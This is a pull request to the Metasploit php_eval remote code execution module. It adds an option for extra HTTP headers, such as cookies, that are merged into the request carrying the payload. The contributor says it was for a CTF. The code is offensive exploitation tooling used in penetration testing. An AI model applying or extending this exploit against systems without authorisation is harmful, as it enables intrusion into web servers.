### PR TITLE
Add HEADERS to php_eval module

### DIFF
--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -45,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('URIPATH',   [ true,  "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
+        OptString.new('HEADERS',   [false,  "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""])
       ])
 
   end
@@ -58,6 +59,18 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     vprint_error("Server responded with #{response.code}")
     return Exploit::CheckCode::Safe
+  end
+
+  def datastore_headers
+    headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
+    headers_hash = {}
+    if headers && !headers.empty?
+      headers.split(',').each do |header|
+        key, value = header.split(':')
+        headers_hash[key] = value.strip
+      end
+    end
+    headers_hash
   end
 
   def exploit
@@ -75,10 +88,9 @@ class MetasploitModule < Msf::Exploit::Remote
     response = send_request_raw({
         'global' => true,
         'uri' => uri,
-        'headers' => {
+        'headers' => datastore_headers.merge(
             headername => payload.encoded,
-            'Connection' => 'close'
-          }
+            'Connection' => 'close')
       },timeout)
     if response and response.code != 200
       print_error("Server returned non-200 status code (#{response.code})")


### PR DESCRIPTION
I needed a way to pass in cookies for a CTF. I pulled this functionality from php_include.rb